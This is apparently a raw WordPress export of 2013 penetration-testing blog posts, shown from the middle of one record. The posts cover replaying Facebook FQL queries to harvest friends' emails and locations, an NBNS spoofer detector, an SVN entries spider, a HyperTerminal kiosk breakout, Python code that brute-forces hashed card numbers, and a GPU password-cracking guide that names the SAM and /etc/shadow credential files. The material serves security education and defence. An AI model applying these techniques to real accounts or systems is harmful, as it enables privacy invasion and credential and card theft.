=> [post_name] => sky-prioritize-yourself [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:36 [post_modified_gmt] => 2021-06-08 21:51:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1138 [menu_order] => 370 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [41] => WP_Post Object ( [ID] => 1142 [post_author] => 10 [post_date] => 2013-10-21 07:00:39 [post_date_gmt] => 2013-10-21 07:00:39 [post_content] =>

A Primer on Facebook Email Privacy

Facebook has a long and storied history of having confusing security and privacy settings. As of late, there are three different settings (that I can find) that you can configure to control access to your email address(es). Each of these settings controls a specific facet of your email address privacy, but in this post we will focus on the third setting in the screen shot below. These settings are responsible for your email privacy, both on your profile and for your friends being able to see your email. This setting can be found by going to the “About” section of your profile and editing your contact information. [Screenshot: email privacy settings under the “About” section] The locks are the configuration settings for your emails being accessible (by friends or publicly) and the circles are the configuration settings for your email showing up in your timeline. The default setting (that I’ve seen) for your email privacy on Facebook is set to “Friends”. [Screenshot: the default “Friends” visibility setting] But this is kind of an odd setting to have, as you can’t access or look up a friend’s email through the web interface of Facebook (assuming it is hidden from the timeline/profile). From what I can tell, this setting is primarily available for importing your Facebook contacts to other services (Gmail, Yahoo, etc.). I find this interesting, as most people assume that they have successfully hidden their email address on Facebook when they choose to not display it on their profile. Most of my friends are currently hiding both email addresses (private and facebook.com addresses) or they are just showing their @facebook.com email address in their profile. However, very few of my friends have their private email address set as available to “Only Me.” The following walkthrough will go over how to enumerate your available Facebook friends’ email addresses by manipulating traffic from the iOS Facebook application.

The Attack

We’ve previously covered a few different attacks on the NetSPI blog regarding proxies and iOS apps. This will be yet another example of abusing permissions given to a mobile app to get access to data. The setup for this attack is pretty simple. We will be using the Burp proxy from Portswigger to intercept the iOS traffic. First, install the Portswigger CA on your iOS device. This is needed to intercept the SSL traffic. Next, proxy your iOS traffic through Burp, and start looking at and modifying/replaying application traffic. I won’t get into the full details here, but the official instructions for setting up the Burp Proxy are here - http://portswigger.net/burp/help/proxy_options_installingCAcert.html#iphone After opening up the Facebook application, we see the following request in the traffic when we go to look at our messages. [Screenshot: the intercepted Facebook API request in Burp]
GET /method/fql.multiquery?sdk=ios&queries=%7B%22group_conversations%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20pic_hash%2C%20participants%2C%20%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20%20WHERE%20timestamp%20%3E%201378149789000%20and%20folder%3D%27inbox%27%20and%20is_group_conversation%3D1%20%20and%20not%20archived%20order%20by%20timestamp%20desc%20limit%203%20offset%200%22%2C%22group_conversation_participants_profile_pic_urls%22%3A%22SELECT%20id%2C%20size%2C%20url%20FROM%20square_profile_pic%20WHERE%20size%20IN%20%2888%2C%20148%29%20AND%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22favoriteRanking-Groups%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%20and%20is_group%22%2C%22favorites%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20favorite_id%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%29%22%2C%22favoriteRanking%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%22%2C%22group_conversations_favorites%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20%20pic_hash%2C%20participants%2C%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20WHERE%20thread_fbid%20IN%20%28select%20favorite_id%20from%20%23favoriteRankingGroups%29%22%2C%22group_conversation_participants%22%3A%22SELECT%20id%2C%20name%20FROM%20profile%20WHERE%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22top_friends%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20uid2%20FROM%20friend%20WHERE%20uid1%3Dme%28%29%20order%20by%20communication_rank%20desc%20LIMIT%2015%29%22%7D&sdk_version=2&access_token=REDACTED&format=json&locale=en_US HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* Cookie: REDACTED Connection: keep-alive Accept-Language: en-us User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 [FBAN/FBIOS;FBAV/6.4;FBBV/290891;FBDV/iPhone4,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1.3;FBSS/2; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/1]
This request selects your conversations along with the information about the people involved in the conversations. It’s a pretty complicated query, but we won’t care about that in a minute. If you want to use this as a tutorial, this is the request that you will want to right-click on and “send to repeater” in Burp. Here’s the unencoded query:
{"group_conversations":"SELECT thread_id, name, title, is_group_conversation, pic_hash, participants,  thread_fbid, timestamp FROM unified_thread  WHERE timestamp > 1378149789000 and folder='inbox' and is_group_conversation=1  and not archived order by timestamp desc limit 3 offset 0","group_conversation_participants_profile_pic_urls":"SELECT id, size, url FROM square_profile_pic WHERE size IN (88, 148) AND id IN (SELECT participants.user_id FROM #group_conversations)","favoriteRankingGroups":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me() and is_group","favorites":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT favorite_id FROM messaging_favorite WHERE uid=me())","favoriteRanking":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me()","group_conversations_favorites":"SELECT thread_id, name, title, is_group_conversation,  pic_hash, participants, thread_fbid, timestamp FROM unified_thread WHERE thread_fbid IN (select favorite_id from #favoriteRankingGroups)","group_conversation_participants":"SELECT id, name FROM profile WHERE id IN (SELECT participants.user_id FROM #group_conversations)","top_friends":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me() order by communication_rank desc LIMIT 15)"}
What we’re going to do is make our own query to get more information about our friends, returned in a nice, easy-to-parse format. Here’s the query that we’re going to use to select our friends’ email addresses: {"friends_email":"SELECT uid, email, contact_email FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me())"} You will have to URL encode the spaces in the query, but you can just paste this over the previous query that we intercepted earlier (and passed to repeater) and URL encode it in Burp. This will select the Facebook User ID, and any email or contact email addresses associated with the account. The UID can also be handy for quickly pulling up someone’s account, i.e. https://www.facebook.com/4. Here’s a sample of what we get back from the query: [{"name":"friends_email","fql_result_set":[{"uid":13931306,"email":"karl\u0040example.com","contact_email":"karl\u0040example.com"}]}] So we can access our friends’ email addresses. This may not seem like a big deal for some people, but if you have friends like mine, then your friends may not want their real email address publicly available through Facebook. If you can’t tell by the screen shot above, my friends appreciate their privacy. While we’re requesting stuff that your friends may not want you to have access to, let’s look at some other interesting info that you can access. Some of my personal favorites (a quick sketch of replaying these queries with Python follows the list):
  • Location Data for check-ins:
    • {" friends_locations":"SELECT coords, message, timestamp FROM location_post WHERE author_uid in (SELECT uid2 FROM friend WHERE uid1=me())"}
  • Publicly liked pages:
    • {" URLs_liked":"SELECT url FROM url_like WHERE user_id =4"}
  • Events information:
    • {"z_events":"SELECT description, host FROM event WHERE creator=4"}
  • Friends of a friend:
    • {"friends_of":"SELECT+uid2+FROM+friend+WHERE+uid1=4"}
From the Facebook Developers page, here’s the schema that you can use to query FQL - https://developers.facebook.com/docs/reference/fql

Conclusion

I did reach out to Facebook about this issue, but since this is “intended” functionality, they were not very interested in hearing about this. The functionality of the email privacy setting doesn’t make a whole lot of sense, but I will be setting my email address to private for all of my accounts. [post_title] => Facebook Friends, Your Email Address Isn’t that Private [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-friends-your-email-address-isnt-that-private [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:34 [post_modified_gmt] => 2021-06-08 21:51:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1142 [menu_order] => 373 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [42] => WP_Post Object ( [ID] => 1148 [post_author] => 10 [post_date] => 2013-09-05 07:00:50 [post_date_gmt] => 2013-09-05 07:00:50 [post_content] =>

One of the easiest ways for us to capture and/or relay hashes on the network is through NBNS spoofing. We will primarily use Responder.py or the Metasploit NBNS spoofing module. Both of these tools can be great for attackers to use during a pen test, but remediation options for fixing the underlying issues are limited. In response to a lack of available mitigation options, I’ve written a script to help identify NBNS spoofers on the network.

This script makes frequent NBNS requests for a non-existent host name (the default is NETSPITEST) and it then listens for NBNS responses. Since there shouldn’t be any responses for this host name, the listener will sit idle until a response is received. If a response is received, we will know that there’s a spoofer on the network. Once a spoofer is identified, email alerting and syslogging options are available to alert network administrators of the issue.
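For anyone curious what that looks like at the packet level, here is a stripped-down illustration of the core idea (this is not the SpoofSpotter code itself): broadcast an NBNS name query for a bogus host and flag anything that answers. The name encoding follows RFC 1002's first-level encoding; the broadcast address below is an assumption for the example network.

import socket, struct, os

def nbns_query(name):
    # RFC 1002 first-level encoding: pad the name to 15 characters, append the
    # 0x00 (workstation) suffix, then split each byte into two nibbles and add
    # each nibble to ord('A').
    raw = name.ljust(15).upper().encode() + b"\x00"
    encoded = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    header = struct.pack(">HHHHHH", int.from_bytes(os.urandom(2), "big"), 0x0110, 1, 0, 0, 0)
    return header + b"\x20" + encoded + b"\x00" + struct.pack(">HH", 0x0020, 0x0001)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.settimeout(5)
sock.sendto(nbns_query("NETSPITEST"), ("192.168.1.255", 137))

try:
    data, addr = sock.recvfrom(1024)
    # Nobody should ever answer for this made-up host name, so any response is a spoofer.
    print("Spoofed NBNS response received from %s" % addr[0])
except socket.timeout:
    print("No response - no spoofer detected this round")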

Example Usage:

sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n NBNSHOSTQUERY -s 192.168.1.2 -e karl.fosaaen@example.com -f test.log

This example command will send custom queries for NBNSHOSTQUERY for a spoofer to respond to. It will send an email alert to karl.fosaaen@example.com when an attack is identified, and responses will also be logged to test.log.

Required arguments:

-i 192.168.1.110      The IP of this host
-b 192.168.1.255      The broadcast IP of this host

Optional arguments:

-h, --help            Show this help message and exit
-f /home/nbns.log, -F /home/nbns.log
                      File name to save a log file
-S true               Log to local syslog - this is pretty beta
-e you@example.com    The email to receive alerts at
-s 192.168.1.109      Email server to send emails to
-n EXAMPLEDOMAIN      The string to query with NBNS, this should be unique
-R true               The option to send garbage SMB auth requests to the attacker (not implemented yet)
-c true               Continue emailing after a detection, could lead to spam

Example Script Output:

$ sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n testfakehostname -s 192.168.1.2 -e karl.fosaaen@netspi.com -f test.log
Starting NBNS Request Thread...
Starting UDP Response Server...
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:47.497274 from host 192.168.1.162
Email Sent
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:49.549245 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:51.600981 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:53.657044 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:55.721037 from host 192.168.1.162
^C
Stopping Server and Exiting...

The script is available out on NetSPI’s github page: https://github.com/NetSPI/SpoofSpotter

There is an additional option that I’m currently working on to make your pen tester especially annoyed. The -R flag will set the SMB response option to try to authenticate with the spoofer’s system. Since NBNS spoofing attacks are used to capture (or relay) hashes, why not send the attacker some hashes? Why not send a ton of them and make the attacker spend their time trying to crack them, or just overload their logs? This will probably annoy an attacker more than anything else, but anything that makes the attack harder may give you extra time to respond.

On that note, it was a little difficult for me to write this tool, as I have a feeling it will come back to haunt me in a future pen test. Feel free to send me any comments or feedback on the script through this blog or through our GitHub page.

Special thanks go out to our client who had the idea for this script.

[post_title] => Identifying Rogue NBNS Spoofers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => identifying-rogue-nbns-spoofers [to_ping] => [pinged] => [post_modified] => 2021-05-03 20:18:24 [post_modified_gmt] => 2021-05-03 20:18:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1148 [menu_order] => 379 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) [43] => WP_Post Object ( [ID] => 1150 [post_author] => 10 [post_date] => 2013-08-20 07:00:41 [post_date_gmt] => 2013-08-20 07:00:41 [post_content] => Frequently during external and web application penetration tests, we run into SVN entries files on web servers. These files are sometimes created as part of the SVN commit process and can lead to the disclosure of files (and source code) that have been added to the web directory. This can be especially impactful for assessments where there may be vulnerable pages (and/or configuration files) that are not clearly advertised from the main web site (i.e.: admin_backdoor.jsp or web.config). The files are typically laid out as lists of file and directory names, each followed by its type (dir, file) on the next line, e.g. "registry" followed by "dir", then "admin_login.jsp" followed by "file". Additionally, there may be source files accessible through the svn-base files (i.e.: /.svn/text-base/ExamplePage.jsp.svn-base). You can consider these files like backups of the originals that (hopefully) won’t execute on the server. Sometimes, the server sees these files with their original extension (.jsp) and you may have trouble getting at the source. The entries files can typically be found in each directory that is used by SVN, as well as any subdirectories. So if a directory shows up in your entries list, it’s worth looking in that directory for another entries file. I got tired of manually going through each of these entries files, so I wrote a script to automate listing the files, source files, and directories into an HTML file. The script also goes into each identified directory to find more entries files to spider.
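To illustrate the spidering idea, here is a minimal Python sketch based on the layout described above (the NetSPI script described below is written in PowerShell, and real entries files vary a bit between SVN versions, so treat this as an approximation): pair each dir/file type line with the name on the line before it and recurse into any directories found. The starting URL is a placeholder.

import urllib.request

def spider_entries(base_url, seen=None):
    # Fetch .svn/entries, print each name/type pair, and recurse into directories.
    seen = seen if seen is not None else set()
    if base_url in seen:
        return
    seen.add(base_url)
    try:
        resp = urllib.request.urlopen(base_url + "/.svn/entries", timeout=10)
        lines = resp.read().decode(errors="replace").splitlines()
    except Exception:
        return
    for i, line in enumerate(lines):
        if line in ("dir", "file") and i > 0 and lines[i - 1].strip():
            name = lines[i - 1].strip()
            print("%s: %s/%s" % (line, base_url, name))
            if line == "dir":
                spider_entries(base_url + "/" + name, seen)

spider_entries("http://somewebsite.com/DIR")  # placeholder target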

Script Usage:

SVNtoDIR   http://somewebsite.com/DIR/.svn/entries  SVNbaseDIR (optional)

Output:

The script will output a directory named after the directory that you’re starting in (i.e.: DIR), and in that directory will be an HTML file (DIR.html) that you can use to start navigating files. Links to the svn-base files are included on the page and show up with the .svn-base file extension. If you are familiar with the default Apache directory listing page, this should be pretty easy for you to navigate. I’ve also added sorting for the table, just click on Name or Type at the top. Additionally, I’ve added an option for a second parameter that you can use for outputting the .svn-base files to a directory. Be careful with this one, as you can potentially end up downloading the entire web root. The script is available out at the NetSPI GitHub - https://github.com/NetSPI/SVNentriesParser [post_title] => Parsing SVN Entries Files with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => parsing-svn-entries-files-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:52 [post_modified_gmt] => 2021-04-13 00:05:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1150 [menu_order] => 382 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [44] => WP_Post Object ( [ID] => 1152 [post_author] => 10 [post_date] => 2013-07-22 07:00:42 [post_date_gmt] => 2013-07-22 07:00:42 [post_content] => It’s not every day that we run into kiosks, terminals, etc. that have HyperTerminal as one of the available applications. This may be a corner case, but it’s another example to add to Scott’s blog about break out methods. In this example, we encountered a terminal setup, where the system was a fairly locked down Windows XP machine. HyperTerminal was one of the only applications in the start menu, and other functionality (shortcut keys, right-click, run) was not available. The method here is pretty simple, but now you can add HyperTerminal as another program to use for breaking out.

Steps to Exploit

First off, we want to open up HyperTerminal and create a new connection to write to. In this example, we’ll just use our non-connected COM1 port as a connection. This is pretty easy to set up; it’s more or less clicking Next until you are dropped into the HyperTerminal window below.
At this point, we will want to turn on the “Echo typed characters locally” setting, so we can see what we’re doing. This can be found under File -> Properties -> Settings Tab -> ASCII Setup. We will want to save the text that we’re typing to the HyperTerminal screen, so select Transfer, then Capture Text. Since the user we are using has rights to write to the startup folder, we are just going to save a batch file that will run at the user’s next logon (C:\Documents and Settings\All Users\Start Menu\Programs\Startup\test.bat). You may not have rights to save there, but you might have access to save the file to another location that you could run the script from. Once the capture is started, type the command(s) that you want to run into the HyperTerminal window and stop the capture. Here we are just going to type cmd and stop, so that the script will pop up a cmd shell when we log in. You have plenty of other possible programs that you could run here. We can see in the example screen that the test.bat file was saved to the startup folder, and when the script is executed, a command shell pops up.

Conclusion

You may never have to use HyperTerminal to break out, but keep it in mind if you are locked out of other routes. For our sysadmin readers, don’t allow HyperTerminal on your terminals, kiosks, etc.
[post_title] => Quick! To the HyperTerminal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => quick-to-the-hyperterminal [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:56 [post_modified_gmt] => 2021-06-08 21:47:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1152 [menu_order] => 384 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [45] => WP_Post Object ( [ID] => 1158 [post_author] => 10 [post_date] => 2013-06-13 07:00:07 [post_date_gmt] => 2013-06-13 07:00:07 [post_content] => As penetration testers, we are frequently engaged to do penetration tests for PCI compliance. As a part of these penetration tests, we look for cardholder data (Card Numbers, CVV, etc.) in files, network traffic, databases, and anywhere else we might be able to catch it. Often times, we will find hashes of credit card numbers along with the first six and/or last four numbers of the credit card number. Given that credit card numbers are a fixed length, this limits the keyspace that we need to use to brute force the hashes. The language in the PCI DSS is a little vague about how cardholder data needs to be hashed, but there is information in requirement 3.4 that helps. “Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches:
  • One-way hashes based on strong cryptography (hash must be of the entire PAN)
  • Truncation (hashing cannot be used to replace the truncated segment of PAN)
  • Index tokens and pads (pads must be securely stored)
  • Strong cryptography with associated key-management processes and procedures”
While this information is good, it does not ensure that the implementer of the hashing function is doing things correctly. “Strong cryptography” can be interpreted a number of different ways. One could argue that SHA256 is a strong hashing algorithm, therefore meeting the requirements. It does not take a significant amount of effort for us to try and brute force SHA256 hashes, so the strength of the algorithm is a moot point. This type of attack is actually called out as a footnote in the requirement. “Note: It is a relatively trivial effort for a malicious individual to reconstruct original PAN data if they have access to both the truncated and hashed version of a PAN. Where hashed and truncated versions of the same PAN are present in an entity’s environment, additional controls should be in place to ensure that the hashed and truncated versions cannot be correlated to reconstruct the original PAN.” These “additional controls” could include salts for the hashes (frequently stored with the hash) or encrypting the truncated versions. There are a number of other potential controls that we could talk about, but that would be enough info for another post. Even with proper additional controls on the PAN data (truncated and hashed), the root of the issue is still the length of the card number and the limited keyspace that is needed for guessing the number. Given a (potentially) sixteen-digit card number, the first six digits, and the last four digits, we are able to easily iterate through the remaining six digits in a matter of minutes. There are only a fixed number of IIN or BIN prefixes for cards (think the first 4-6 numbers of a card). These numbers are available online and pretty easy to find. Given a list of these numbers, we are able to reduce our cracking efforts for situations where hashes are only stored with the last four digits of the card number. Factoring in that credit card numbers are Luhn valid, this further reduces the amount of effort that we have to go through to hash the credit card number guesses. For this example, we will use the TCF Debit Card BIN. With a million potential card numbers (000000 to 999999 for the middle digits) and a last four of 1234, there are 100,000 potential Luhn-valid card numbers in this space. So as you can see in this case, the Luhn check cuts the cracking space down by ninety percent. As it turns out, this will be the case with any of the credit card numbers that you are brute forcing. Since the last (or check) digit can only be one of ten numbers (0-9), only about one in ten candidates for the middle digits produces a valid check digit. Simply put, this works because you are not brute forcing the check digit. Time-wise, it takes about 30 minutes to get through this keyspace (for the example number above) on a 2.80 GHz Intel Core i7 processor. I also ran this test with several other programs open, so your results may vary. In general practice, I’ve seen most hashes crack within two minutes.

Code

The code for cracking these hashes is actually quite simple. Read in the input file, iterate through the numbers that need guessing, and hash the Luhn-valid numbers. If a guess hash matches your input hash, the script will write out your results to your output file. There’s also a small block in here to read in a list of IIN/BINs to use when you need to do guessing on the first 4-6 digits of the card number. You will have to provide your own list of these. Below is some sample output with the full card numbers and hashes redacted. Each period represents a Luhn-valid card number and is used to show the cracking status. I’ve put the code out on the NetSPI GitHub for those who are interested: http://netspi.github.io/PS_CC_Checker/
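For readers who want to see the brute-force loop itself, here is a minimal Python sketch of the approach (the NetSPI tool is written in PowerShell; the BIN, last four digits, hash algorithm, and target hash below are all made-up placeholders): iterate the six unknown middle digits, skip anything that is not Luhn valid, and compare hashes.

import hashlib

def luhn_valid(number):
    # Standard Luhn check: double every second digit from the right, subtract 9
    # from anything over 9, and require the total to be a multiple of ten.
    digits = [int(d) for d in reversed(number)]
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

first6, last4 = "412345", "1234"                           # placeholder BIN and last four
target = hashlib.sha256(b"4123450000071234").hexdigest()   # demo target hash

for middle in range(1000000):
    candidate = "%s%06d%s" % (first6, middle, last4)
    if not luhn_valid(candidate):
        continue                        # roughly 90% of the keyspace is skipped here
    if hashlib.sha256(candidate.encode()).hexdigest() == target:
        print("Cracked PAN: " + candidate)
        break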

Conclusion

The PCI DSS allows merchants to store partial card numbers, but not the full number. While the card number may not be stored in full, storing the hash of the card along with some of the digits allows an attacker to make educated guesses about the card number. This basically renders the hashing useless. While this is directly called out in requirement 3.4 of the DSS, we have found instances of hashes being stored with the truncated PAN data. Even without the truncated PAN data, the cracking effort for a card number hash is still reduced by the static IIN/BIN numbers associated with the card issuer. [post_title] => Cracking Credit Card Hashes with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-credit-card-hashes-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:32 [post_modified_gmt] => 2021-06-08 21:51:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1158 [menu_order] => 390 [post_type] => post [post_mime_type] => [comment_count] => 3 [filter] => raw ) [46] => WP_Post Object ( [ID] => 1160 [post_author] => 10 [post_date] => 2013-06-04 07:00:09 [post_date_gmt] => 2013-06-04 07:00:09 [post_content] => In the first blog of this series, we showed you how to set up the hardware for your own GPU cracking box. In the second blog of this series, we showed you how to set up the OS, drivers, and software for your own GPU cracking box. In this blog, we will simply go over common ways to get hashes along with methods and strategies for cracking the hashes. We will touch on most of these topics at a high level, and add links to help you get more information on each topic. Again, this is a pretty basic intro, but hopefully it will serve as a starter’s guide for those looking into password cracking.

Common Ways to Get Hashes

We could write an entire post on ways to capture these, but we will just touch on some high level common methods for getting the hashes.

LM/NTLM

Some of the most common hashes that we crack are Windows LANMAN and/or NTLM hashes. For systems where you have file read rights on the SYSTEM and SAM files (local admin rights, web directory traversal, etc.), you will want to copy them off of the host for hash extraction. Windows XP/Vista/Server 2003 paths:
  • C:\Windows\System32\config\SAM
  • C:\Windows\System32\config\SYSTEM
Windows 7 and Server 2008
  • C:\Windows\System32\config\RegBack\SAM
  • C:\Windows\System32\config\RegBack\SYSTEM
Once you have these files, there are a number of tools that you can use to extract the hashes. Personally, I just import the files into Cain and export the hashes. If you have a meterpreter session on the system and “NT AUTHORITY\SYSTEM” rights on the host, you can easily run the smart_hashdump module to dump out the local password hashes. Dumping hashes on a Server 2008 domain controller can be a little trickier. Pauldotcom has a great writeup on the process. Additionally, you can get password hashes from the network with tools like Responder and the smb_capture module in Metasploit. These can be captured in both LM and NTLM formats. The LM format can be cracked with a combination of rainbow tables and cracking. I’ve also automated that process with a script. The cracking of network NTLM hashes is now supported by OCLHashcat. Previously, Cain was the only tool (that I knew of) that could crack them, and Cain was doing CPU cracking, not GPU cracking.

Linux Hashes

Dumping hashes from Linux systems can be fairly straightforward. If you have root access on the host, you can use the unshadow tool to get the hashes out into a John-compatible format. Oftentimes you will instead have arbitrary file read access, in which case you will want to grab the /etc/shadow and /etc/passwd files for offline cracking of the hashes.

Web App Hashes

Many web applications store their password hashes in their databases, so those hashes may end up getting compromised through SQL injection or other attacks. Web content management systems (WordPress, Drupal, etc.), and more specifically their plugins, are also common targets for SQL injection and other attacks that expose password hashes. These hashes can vary in format (MD5, SHA1, etc.), but most that I have seen are unsalted, making them easier to crack. When web application hashes are salted, you may get lucky and find the salts stored in the database right alongside the hashes. It’s not common, but it happens.

Cracking the Hashes

At this point we’re going to assume that you have taken the time to set up your hardware and software for cracking. If you want some tips, check out the links at the top of this post. For most of your cracking needs, you will want to start with a simple dictionary attack. This will quickly catch any of the simple or commonly used passwords in your hashes. Given a robust dictionary, a good rule set, and a solid cracking box, it can be pretty easy to crack a lot of passwords with little effort. Here are some basic dictionaries to get you started:
  • Skull Security has a great list (including the Rockyou list) of dictionaries
  • Crackstation has a 15 GB dictionary available with pay what you want/can pricing
  • A uniqued copy of Wikipedia can make for an interesting dictionary
You will probably want to get some hashes for benchmarking your cards’ or CPU’s performance. There are tons of possible benchmarking hashes in the cracking requests sections on the InsidePro forums. Here you can frequently find large dumps of hashes from users requesting that someone crack their hashes for them. While the sources of these hashes are rarely disclosed, you could get a great sample of hashes to practice cracking. As for software, the three main pieces of cracking software that we use are Cain, John the Ripper, and OCLhashcat. I won’t include commands on how to run those, as they are very well documented elsewhere.

Conclusion

Hopefully this blog has given you some tips on getting started on gathering and cracking hashes. If you have any questions on the hardware, software, or anything else, feel free to leave us a comment. [post_title] => GPU Cracking: Putting It All Together [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-putting-it-all-together [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1160 [menu_order] => 392 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [47] => WP_Post Object ( [ID] => 1166 [post_author] => 10 [post_date] => 2013-04-07 07:00:20 [post_date_gmt] => 2013-04-07 07:00:20 [post_content] =>

Intro

This winter, we decided to create our own dedicated GPU cracking solution to use for our assessments. It was quite the process, but we now have a fully functional hash cracking machine that tears through NTLMs at roughly 25 billion hashes per second (See below). While attempting to build this, we learned a lot about pushing the limits of consumer-grade hardware. We've recently updated this blog with more recent info - https://blog.netspi.com/gpu-cracking-rebuilding-box/

Goals

We set out to build a cracking rig with four high-end video cards (AMD Radeon HD 7950) to run oclHashcat. We also wanted this solution to be rack mountable, so that it would be easy to store in our data center. As it turns out, there are not a ton of video card friendly server cases. We were only able to find a few GPU cracking friendly cases, but most of them cost more than the rest of our cracking hardware combined. If you have the money to spend, we would recommend going with the special case to save yourself from other issues, but this isn’t really an option for everyone. The reason why we recommend this is that the cards themselves do not take well to being lined up all together on a standard ATX motherboard. The fans tend to stick out further than they should and end up hitting the next card in the row. On top of that, the cramped conditions lead to overheating cards and cracking jobs stopping. The specialized cases have enough space to avoid these issues, making it easier to set up a box. We opted for an “open air” configuration for our cracking box. This was primarily driven by trying to mimic the setups of bitcoin mining rigs that we had seen online. I will say that this is not the prettiest option for housing all of these cards. However, it is one of the most efficient ways to space the cards out for cooling. With the “open air” setup, we’re able to connect riser cables to two of the cards and keep the other two cards down on the board. These riser cables can have their own problems. We ended up opting for one (16x to 1x) riser cable and a different (16x to 16x) riser cable that has some modifications for voltage. The 16x to 16x cable has a 12 volt molex adapter soldered to the 12 volt pins on the riser slot. While this looks a little hackish, it actually works quite well. We had to do this to supplement the voltage from the motherboard, as it was unable to pull proper voltage for all four cards (with two riser cables). I should also mention that there is some crafty engineering taking place to suspend the two cards above the board. This was accomplished with several zip ties and a modified piece of wire-mesh shelving. I should also note that this whole rig is tied down (with stand-offs) to an old rack mount shelf. All in all, this setup works quite well. We can have all four cards running at full speed and the hottest card will top out at 85° Celsius. We’re very aware of the fact that this looks insane. It’s hopefully a temporary solution. Eventually, we’re looking at securing a single rail to the rack to screw the cards into. As for performance, here are our current averages for hash cracking (OCL in Brute-Force mode): MD5 – ~16000.0 M/s, NTLM – ~25500.0 M/s, SHA1 – ~7900.0 M/s

5 Tips for Building Your Own

So if you’re planning on putting together your own GPU cracking rig, here’s some steps that you may want to take to make it easier.
  1. Look into a nice GPU server case and motherboard combo like this one http://www.newegg.com/Product/Product.aspx?Item=N82E16816152125
    1. These will be spendy (~$3,500+ for the combo, cards not included) but they are meant for this kind of setup.
  2. Look at what the bitcoin miners are doing.
    1. Our “open-air” setup is actually pretty similar to most mining rigs that I can find.
    2. Replicate their parts list for your setup; if it works for them, it “should” work for you.
  3. Plan everything out as best you can.
    1. From components and case layout to power and cooling requirements.
    2. Measure twice and cut once to avoid returns, repairs, and rebuying parts.
  4. Devote a resource to the project
    1. Intern not busy enough? Have them build the cracking machine.
    2. Find the person that plays more PC games than you.
